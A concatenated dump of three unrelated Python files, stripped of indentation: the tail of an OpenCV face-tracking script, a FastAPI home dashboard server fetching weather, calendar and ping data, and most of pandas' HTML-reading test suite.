# Z-Axis translation amt: w = fX/Z -> Z = fX/w
ztrans = self.camera_f - self.camera_f * interp_shape[0] / self.w
# Display image (for fun)
color = self.compute_interp_color(interp_shape)
cv2.rectangle(frame, (WINDOW_AMT*best_j, WINDOW_AMT*best_i), (WINDOW_AMT*best_j + self.w, WINDOW_AMT*best_i + self.h), color=color, thickness=2)
cv2.imshow("frame", frame)
cv2.waitKey(1)
return np.array(rot), ztrans, interp_rot
def determine_best_shift(self, face_pyramid, frame_pyramid):
wa = int(WINDOW_AMT / (2 ** NUM_PYR))
region_indices = [0, (frame_pyramid[-1].shape[0] - face_pyramid[-1].shape[0]) / wa,
0, (frame_pyramid[-1].shape[1] - face_pyramid[-1].shape[1]) / wa]
for pyr_index in reversed(range(NUM_PYR+1)):
res = self.compute_ssd(frame_pyramid[pyr_index],
face_pyramid[pyr_index],
2 ** pyr_index,
region_indices)
if res is None:
break
best_i, best_j, tmp_ssd = res
if pyr_index == NUM_PYR:
best_ssd = tmp_ssd
region_indices = [best_i - 1, best_i + 1,
best_j - 1, best_j + 1]
return best_i, best_j, best_ssd
def compute_ssd(self, frame, face, scaleAmt, region_indices):
wa = int(WINDOW_AMT / scaleAmt)
h = face.shape[0]
w = face.shape[1]
ssds = {}
for i in range(region_indices[0], region_indices[1]):
for j in range(region_indices[2], region_indices[3]):
cand_roi = frame[wa*i:wa*i+h, wa*j:wa*j+w]
if cand_roi.shape == face.shape:
ssds[(i, j)] = ((face - cand_roi) ** 2).sum()
if not ssds:
return None
best_i, best_j = min(ssds, key=lambda k: ssds[k])
return best_i, best_j, ssds[(best_i, best_j)]
def main():
FacialRecognition().run()
if __name__ == "__main__":
main()
|
server.py
|
from fastapi import FastAPI, Request, Response
from fastapi.responses import JSONResponse, FileResponse, HTMLResponse
from fastapi.staticfiles import StaticFiles
import json, os
from util import fetchWeatherInformation, Calendar
from multiprocessing import Process
import time
import uvicorn
import datetime
import icmplib
def apiFetchLoop(conf): # Loop through getting API data and saving it locally
# Initialize calendar
calendars = [Calendar(os.path.join(*conf['calKey'].split('/')), c['id'], emailMap=conf['emailMap'], tz=conf['timezone'], name=c['name'], color=c['color']) for c in conf['calendars']]
while True:
# Get weather info
data, img = fetchWeatherInformation(
conf['target']['latitude'],
conf['target']['longitude'],
conf['target']['zoom'],
keys={
'owm': conf['owmKey'],
'mapbox': conf['mbKey']
},
tileSpan=conf['target']['tileSpan'],
includeLayers=conf['target']['layers'],
units=conf['units']
)
with open(os.path.join(*conf['persistenceFolder'].split('/'), 'oneCall.json'), 'w') as f:
json.dump(data, f, indent=4)
with open(os.path.join(*conf['persistenceFolder'].split('/'), 'weatherMap.png'), 'wb') as f:
f.write(img)
# Get events
events = []
for cal in calendars:
events.extend(cal.getEvents(count=conf['eventCount']))
events = sorted(events, key=lambda event: datetime.datetime.fromisoformat(event['start']).timestamp())
with open(os.path.join(*conf['persistenceFolder'].split('/'), 'calendarEvents.json'), 'w') as f:
json.dump(events, f, indent=4)
time.sleep(conf['fetchLoopDelay'])
def pingLoop(conf):
while True:
serverdata = conf['servers'][:]
for i in serverdata:
try:
pingdata = icmplib.ping(i['address'], privileged=False)
i['alive'] = pingdata.is_alive
i['ping'] = str(pingdata.avg_rtt) + 's'
except icmplib.NameLookupError:
i['alive'] = False
i['ping'] = 'N/A'
with open(os.path.join(*conf['persistenceFolder'].split('/'), 'pingData.json'), 'w') as f:
json.dump(serverdata, f, indent=4)
time.sleep(conf['pingLoopDelay'])
# Load configuration file @ config.json
with open('config.json', 'r') as f:
CONFIG = json.load(f)
STARTTIME = time.time()
app = FastAPI()
@app.get('/debug')
async def get_debug():
return {'target': CONFIG['target'], 'calendars': CONFIG['calendars'], 'units': CONFIG['units']}
@app.get('/data/weatherMap')
async def get_weather_map():
return FileResponse(os.path.join(*CONFIG['persistenceFolder'].split('/'), 'weatherMap.png'), headers={
'Cache-Control': 'no-cache'
})
@app.get('/data/weather')
async def get_weather_data():
with open(os.path.join(*CONFIG['persistenceFolder'].split('/'), 'oneCall.json'), 'r') as f:
return json.load(f)
@app.get('/data/events')
async def get_events():
with open(os.path.join(*CONFIG['persistenceFolder'].split('/'), 'calendarEvents.json'), 'r') as f:
return json.load(f)
@app.get('/data/pings')
async def get_pings():
with open(os.path.join(*CONFIG['persistenceFolder'].split('/'), 'pingData.json'), 'r') as f:
return json.load(f)
app.mount('/s', StaticFiles(directory='web'), name='static')
@app.get('/')
async def get_root():
return FileResponse(os.path.join('web', 'index.html'), media_type='text/html')
# Start loop process and run server if this execution is the main execution
if __name__ == '__main__':
# Make persistent file directory
if not os.path.exists(os.path.join(*CONFIG['persistenceFolder'].split('/'))):
os.mkdir(os.path.join(*CONFIG['persistenceFolder'].split('/')))
# Start fetch loop
RUNNING_PROCESS = Process(target=apiFetchLoop, name='FetchLoop', args=[CONFIG], daemon=True)
RUNNING_PROCESS.start()
RUNNING_PROCESS2 = Process(target=pingLoop, name='PingLoop', args=[CONFIG], daemon=True)
RUNNING_PROCESS2.start()
# Start REST API
uvicorn.run('server:app', host=CONFIG['host'], port=CONFIG['port'], access_log=False)
|
test_html.py
|
from __future__ import print_function
from functools import partial
import os
import re
import threading
import numpy as np
from numpy.random import rand
import pytest
from pandas.compat import (
BytesIO, StringIO, is_platform_windows, map, reload, zip)
from pandas.errors import ParserError
import pandas.util._test_decorators as td
from pandas import (
DataFrame, Index, MultiIndex, Series, Timestamp, date_range, read_csv)
import pandas.util.testing as tm
from pandas.util.testing import makeCustomDataframe as mkdf, network
from pandas.io.common import URLError, file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
HERE = os.path.dirname(__file__)
@pytest.fixture(params=[
'chinese_utf-16.html',
'chinese_utf-32.html',
'chinese_utf-8.html',
'letz_latin1.html',
])
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath('io', 'data', 'html_encoding', request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
assert len(list1) == len(list2), ('lists are not of equal size '
'len(list1) == {0}, '
'len(list2) == {1}'.format(len(list1),
len(list2)))
msg = 'not all list elements are DataFrames'
both_frames = all(map(lambda x, y: isinstance(x, DataFrame) and
isinstance(y, DataFrame), list1, list2))
assert both_frames, msg
for frame_i, frame_j in zip(list1, list2):
tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
assert not frame_i.empty, 'frames are both empty'
@td.skip_if_no('bs4')
def test_bs4_version_fails(monkeypatch, datapath):
import bs4
monkeypatch.setattr(bs4, '__version__', '4.2')
with pytest.raises(ValueError, match="minimum version"):
read_html(datapath("io", "data", "spam.html"), flavor='bs4')
def test_invalid_flavor():
url = "google.com"
flavor = "invalid flavor"
msg = r"\{" + flavor + r"\} is not a valid set of flavors"
with pytest.raises(ValueError, match=msg):
read_html(url, "google", flavor=flavor)
@td.skip_if_no('bs4')
@td.skip_if_no('lxml')
def test_same_ordering(datapath):
filename = datapath('io', 'data', 'valid_markup.html')
dfs_lxml = read_html(filename, index_col=0, flavor=['lxml'])
dfs_bs4 = read_html(filename, index_col=0, flavor=['bs4'])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize("flavor", [
pytest.param('bs4', marks=pytest.mark.skipif(
not td.safe_import('lxml'), reason='No bs4')),
pytest.param('lxml', marks=pytest.mark.skipif(
not td.safe_import('lxml'), reason='No lxml'))], scope="class")
class TestReadHtml(object):
@pytest.fixture(autouse=True)
def set_files(self, datapath):
self.spam_data = datapath('io', 'data', 'spam.html')
self.spam_data_kwargs = {}
self.spam_data_kwargs['encoding'] = 'UTF-8'
self.banklist_data = datapath("io", "data", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor, request):
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
df = mkdf(4, 3, data_gen_f=lambda *args: rand(), c_idx_names=False,
r_idx_names=False).applymap('{0:.3f}'.format).astype(float)
out = df.to_html()
res = self.read_html(out, attrs={'class': 'dataframe'}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@network
def test_banklist_url(self):
url = 'http://www.fdic.gov/bank/individual/failed/banklist.html'
df1 = self.read_html(url, 'First Federal Bank of Florida',
attrs={"id": 'table'})
df2 = self.read_html(url, 'Metcalf Bank', attrs={'id': 'table'})
assert_framelist_equal(df1, df2)
@network
def test_spam_url(self):
url = ('http://ndb.nal.usda.gov/ndb/foods/show/300772?fg=&man=&'
'lfacet=&format=&count=&max=25&offset=&sort=&qlookup=spam')
df1 = self.read_html(url, '.*Water.*')
df2 = self.read_html(url, 'Unit')
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self):
df1 = self.read_html(self.banklist_data, '.*Florida.*',
attrs={'id': 'table'})
df2 = self.read_html(self.banklist_data, 'Metcalf Bank',
attrs={'id': 'table'})
assert_framelist_equal(df1, df2)
def test_spam(self):
df1 = self.read_html(self.spam_data, '.*Water.*')
df2 = self.read_html(self.spam_data, 'Unit')
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == 'Proximates'
assert df1[0].columns[0] == 'Nutrient'
def test_spam_no_match(self):
dfs = self.read_html(self.spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self):
dfs = self.read_html(self.banklist_data, attrs={'id': 'table'})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self):
df = self.read_html(self.spam_data, '.*Water.*', header=2)[0]
assert df.columns[0] == 'Proximates'
assert not df.empty
def test_skiprows_int(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=1)
df2 = self.read_html(self.spam_data, 'Unit', skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_xrange(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=range(2))[0]
df2 = self.read_html(self.spam_data, 'Unit', skiprows=range(2))[0]
tm.assert_frame_equal(df1, df2)
def test_skiprows_list(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=[1, 2])
df2 = self.read_html(self.spam_data, 'Unit', skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows={1, 2})
df2 = self.read_html(self.spam_data, 'Unit', skiprows={2, 1})
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=1)
df2 = self.read_html(self.spam_data, 'Unit', skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=slice(2))
df2 = self.read_html(self.spam_data, 'Unit', skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=slice(2, 5))
df2 = self.read_html(self.spam_data, 'Unit', skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self):
df1 = self.read_html(self.spam_data, '.*Water.*',
skiprows=np.arange(2))
df2 = self.read_html(self.spam_data, 'Unit', skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows_invalid(self):
with pytest.raises(TypeError, match=('is not a valid type '
'for skipping rows')):
self.read_html(self.spam_data, '.*Water.*', skiprows='asdf')
def test_index(self):
df1 = self.read_html(self.spam_data, '.*Water.*', index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_no_types(self):
df1 = self.read_html(self.spam_data, '.*Water.*', header=1,
index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_with_types(self):
df1 = self.read_html(self.spam_data, '.*Water.*', header=1,
index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_infer_types(self):
# 10892 infer_types removed
df1 = self.read_html(self.spam_data, '.*Water.*', index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', index_col=0)
assert_framelist_equal(df1, df2)
def test_string_io(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data1 = StringIO(f.read())
with open(self.spam_data, **self.spam_data_kwargs) as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, '.*Water.*')
df2 = self.read_html(data2, 'Unit')
assert_framelist_equal(df1, df2)
def test_string(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data = f.read()
df1 = self.read_html(data, '.*Water.*')
df2 = self.read_html(data, 'Unit')
assert_framelist_equal(df1, df2)
def test_file_like(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
df1 = self.read_html(f, '.*Water.*')
with open(self.spam_data, **self.spam_data_kwargs) as f:
df2 = self.read_html(f, 'Unit')
assert_framelist_equal(df1, df2)
@network
def test_bad_url_protocol(self):
with pytest.raises(URLError):
self.read_html('git://github.com', match='.*Water.*')
@network
def test_invalid_url(self):
try:
with pytest.raises(URLError):
self.read_html('http://www.a23950sdfa908sd.com',
match='.*Water.*')
except ValueError as e:
assert 'No tables found' in str(e)
@pytest.mark.slow
def test_file_url(self):
url = self.banklist_data
dfs = self.read_html(file_path_to_url(os.path.abspath(url)),
'First',
attrs={'id': 'table'})
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
@pytest.mark.slow
def test_invalid_table_attrs(self):
url = self.banklist_data
with pytest.raises(ValueError, match='No tables found'):
self.read_html(url, 'First Federal Bank of Florida',
attrs={'id': 'tasdfable'})
def _bank_data(self, *args, **kwargs):
return self.read_html(self.banklist_data, 'Metcalf',
attrs={'id': 'table'}, *args, **kwargs)
@pytest.mark.slow
def test_multiindex_header(self):
df = self._bank_data(header=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_index(self):
df = self._bank_data(index_col=[0, 1])[0]
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows_tuples(self):
with tm.assert_produces_warning(FutureWarning, check_stacklevel=False):
df = self._bank_data(header=[0, 1], skiprows=1,
tupleize_cols=True)[0]
assert isinstance(df.columns, Index)
@pytest.mark.slow
def test_multiindex_header_skiprows(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index_skiprows(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0]
assert isinstance(df.index, MultiIndex)
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_regex_idempotency(self):
url = self.banklist_data
dfs = self.read_html(file_path_to_url(os.path.abspath(url)),
match=re.compile(re.compile('Florida')),
attrs={'id': 'table'})
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
def test_negative_skiprows(self):
msg = r'\(you passed a negative value\)'
with pytest.raises(ValueError, match=msg):
self.read_html(self.spam_data, 'Water', skiprows=-1)
@network
def test_multiple_matches(self):
url = 'https://docs.python.org/2/'
dfs = self.read_html(url, match='Python')
assert len(dfs) > 1
@network
def test_python_docs_table(self):
url = 'https://docs.python.org/2/'
dfs = self.read_html(url, match='Python')
zz = [df.iloc[0, 0][0:4] for df in dfs]
assert sorted(zz) == sorted(['Repo', 'What'])
@pytest.mark.slow
def test_thousands_macau_stats(self, datapath):
all_non_nan_table_index = -2
macau_data = datapath("io", "data", "macau.html")
dfs = self.read_html(macau_data, index_col=0,
attrs={'class': 'style1'})
df = dfs[all_non_nan_table_index]
assert not any(s.isna().any() for _, s in df.iteritems())
@pytest.mark.slow
def test_thousands_macau_index_col(self, datapath):
all_non_nan_table_index = -2
macau_data = datapath('io', 'data', 'macau.html')
dfs = self.read_html(macau_data, index_col=0, header=0)
df = dfs[all_non_nan_table_index]
assert not any(s.isna().any() for _, s in df.iteritems())
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
result = self.read_html('''
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
''')
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html('''<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html('''<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data={'Header': 'first'}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
"""
Ensure parser adds <tr> within <thead> on malformed HTML.
"""
result = self.read_html('''<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data=[['Ukraine', 'Odessa', 1944]],
columns=['Country', 'Municipality', 'Year'])
tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
"""
Make sure that read_html reads tfoot, containing td or th.
Ignores empty tfoot
"""
data_template = '''<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>'''
expected1 = DataFrame(data=[['bodyA', 'bodyB']], columns=['A', 'B'])
expected2 = DataFrame(data=[['bodyA', 'bodyB'], ['footA', 'footB']],
columns=['A', 'B'])
data1 = data_template.format(footer="")
data2 = data_template.format(
footer="<tr><td>footA</td><th>footB</th></tr>")
result1 = self.read_html(data1)[0]
result2 = self.read_html(data2)[0]
tm.assert_frame_equal(result1, expected1)
tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
# GH5048: if header is specified explicitly, an int column should be
# parsed as int while its header is parsed as str
result = self.read_html('''
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
''', header=0)[0]
expected = DataFrame([['text', 1944]], columns=('S', 'I'))
tm.assert_frame_equal(result, expected)
def test_nyse_wsj_commas_table(self, datapath):
data = datapath('io', 'data', 'nyse_wsj.html')
df = self.read_html(data, index_col=0, header=0,
attrs={'class': 'mdcTable'})[0]
expected = Index(['Issue(Roll over for charts and headlines)',
'Volume', 'Price', 'Chg', '% Chg'])
nrows = 100
assert df.shape[0] == nrows
tm.assert_index_equal(df.columns, expected)
@pytest.mark.slow
def test_banklist_header(self, datapath):
from pandas.io.html import _remove_whitespace
def try_remove_ws(x):
try:
return _remove_whitespace(x)
except AttributeError:
return x
df = self.read_html(self.banklist_data, 'Metcalf',
attrs={'id': 'table'})[0]
ground_truth = read_csv(datapath('io', 'data', 'banklist.csv'),
converters={'Updated Date': Timestamp,
'Closing Date': Timestamp})
assert df.shape == ground_truth.shape
old = ['First Vietnamese American BankIn Vietnamese',
'Westernbank Puerto RicoEn Espanol',
'R-G Premier Bank of Puerto RicoEn Espanol',
'EurobankEn Espanol', 'Sanderson State BankEn Espanol',
'Washington Mutual Bank(Including its subsidiary Washington '
'Mutual Bank FSB)',
'Silver State BankEn Espanol',
'AmTrade International BankEn Espanol',
'Hamilton Bank, NAEn Espanol',
'The Citizens Savings BankPioneer Community Bank, Inc.']
new = ['First Vietnamese American Bank', 'Westernbank Puerto Rico',
'R-G Premier Bank of Puerto Rico', 'Eurobank',
'Sanderson State Bank', 'Washington Mutual Bank',
'Silver State Bank', 'AmTrade International Bank',
'Hamilton Bank, NA', 'The Citizens Savings Bank']
dfnew = df.applymap(try_remove_ws).replace(old, new)
gtnew = ground_truth.applymap(try_remove_ws)
converted = dfnew._convert(datetime=True, numeric=True)
date_cols = ['Closing Date', 'Updated Date']
converted[date_cols] = converted[date_cols]._convert(datetime=True,
coerce=True)
tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self):
gc = 'Gold Canyon'
with open(self.banklist_data, 'r') as f:
raw_text = f.read()
assert gc in raw_text
df = self.read_html(self.banklist_data, 'Gold Canyon',
attrs={'id': 'table'})[0]
assert gc in df.to_string()
def test_different_number_of_cols(self):
expected = self.read_html("""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""", index_col=0)[0]
result = self.read_html("""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""", index_col=0)[0]
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
""")[0]
expected = DataFrame([['a', 'b', 'c']], columns=['A', 'B', 'C'])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# X x Y Z W
# A B b z C
result = self.read_html("""
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B', 'B', 'Z', 'C']],
columns=['X', 'X.1', 'Y', 'Z', 'W'])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_both_not_1(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B b b C
# a b b b D
result = self.read_html("""
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B', 'B', 'B', 'D']],
columns=['A', 'B', 'B.1', 'B.2', 'C'])
tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B
# C b
result = self.read_html("""
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['C', 'B']], columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B'], ['A', 'B']],
columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
""")[0]
columns = MultiIndex(levels=[['A', 'B'], ['a', 'b']],
codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
df = DataFrame({'date': date_range('1/1/2001', periods=10)})
expected = df.to_html()
res = self.read_html(expected, parse_dates=[1], index_col=0)
tm.assert_frame_equal(df, res[0])
res = self.read_html(expected, parse_dates=['date'], index_col=0)
tm.assert_frame_equal(df, res[0])
def test_parse_dates_combine(self):
raw_dates = Series(date_range('1/1/2001', periods=10))
df = DataFrame({'date': raw_dates.map(lambda x: str(x.date())),
'time': raw_dates.map(lambda x: str(x.time()))})
res = self.read_html(df.to_html(), parse_dates={'datetime': [1, 2]},
index_col=1)
newdf = DataFrame({'datetime': raw_dates})
tm.assert_frame_equal(newdf, res[0])
def test_computer_sales_page(self, datapath):
data = datapath('io', 'data', 'computer_sales_page.html')
msg = (r"Passed header=\[0,1\] are too many "
r"rows for this multi_index of columns")
with pytest.raises(ParserError, match=msg):
self.read_html(data, header=[0, 1])
data = datapath('io', 'data', 'computer_sales_page.html')
assert self.read_html(data, header=[1, 2])
def test_wikipedia_states_table(self, datapath):
data = datapath('io', 'data', 'wikipedia_states.html')
assert os.path.isfile(data), '%r is not a file' % data
assert os.path.getsize(data), '%r is an empty file' % data
result = self.read_html(data, 'Arizona', header=1)[0]
assert result['sq mi'].dtype == np.dtype('float64')
def test_parser_error_on_empty_header_row(self):
msg = (r"Passed header=\[0,1\] are too many "
r"rows for this multi_index of columns")
with pytest.raises(ParserError, match=msg):
self.read_html("""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
""", header=[0, 1])
def test_decimal_rows(self):
# GH 12907
result = self.read_html('''<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>''', decimal='#')[0]
expected = DataFrame(data={'Header': 1100.101}, index=[0])
assert result['Header'].dtype == np.dtype('float64')
tm.assert_frame_equal(result, expected)
def test_bool_header_arg(self):
# GH 6114
for arg in [True, False]:
with pytest.raises(TypeError):
self.read_html(self.spam_data, header=arg)
def test_converters(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
converters={'a': str}
)[0]
expected = DataFrame({'a': ['0.763', '0.244']})
tm.assert_frame_equal(result, expected)
def test_na_values(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
na_values=[0.244])[0]
expected = DataFrame({'a': [0.763, np.nan]})
tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
expected_df = DataFrame({'a': ['N/A', 'NA']})
html_df = self.read_html(html_data, keep_default_na=False)[0]
tm.assert_frame_equal(expected_df, html_df)
expected_df = DataFrame({'a': [np.nan, np.nan]})
html_df = self.read_html(html_data, keep_default_na=True)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
""")[0]
expected = DataFrame(data=[['a', 'b'], [np.nan, np.nan]],
columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
result = self.read_html("""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
""")[0]
columns = MultiIndex(levels=[['A', 'B'], ['a', 'b']],
codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
# Issue #13434
expected_df = DataFrame(data=[("Hillary", 68, "D"),
("Bernie", 74, "D"),
("Donald", 69, "R")])
expected_df.columns = [["Unnamed: 0_level_0", "Age", "Party"],
["Name", "Unnamed: 1_level_1",
"Unnamed: 2_level_1"]]
html = expected_df.to_html(index=False)
html_df = self.read_html(html, )[0]
tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
filename = datapath('io', 'data', 'valid_markup.html')
dfs = self.read_html(filename, index_col=0)
assert isinstance(dfs, list)
assert isinstance(dfs[0], DataFrame)
@pytest.mark.slow
def test_fallback_success(self, datapath):
banklist_data = datapath('io', 'data', 'banklist.html')
self.read_html(banklist_data, '.*Water.*', flavor=['lxml', 'html5lib'])
def test_to_html_timestamp(self):
rng = date_range('2000-01-01', periods=10)
df = DataFrame(np.random.randn(10, 4), index=rng)
result = df.to_html()
assert '2000-01-01' in result
@pytest.mark.parametrize("displayed_only,exp0,exp1", [
(True, DataFrame(["foo"]), None),
(False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"]))])
def test_displayed_only(self, displayed_only, exp0, exp1):
# GH 20027
data = StringIO("""<html>
<body>
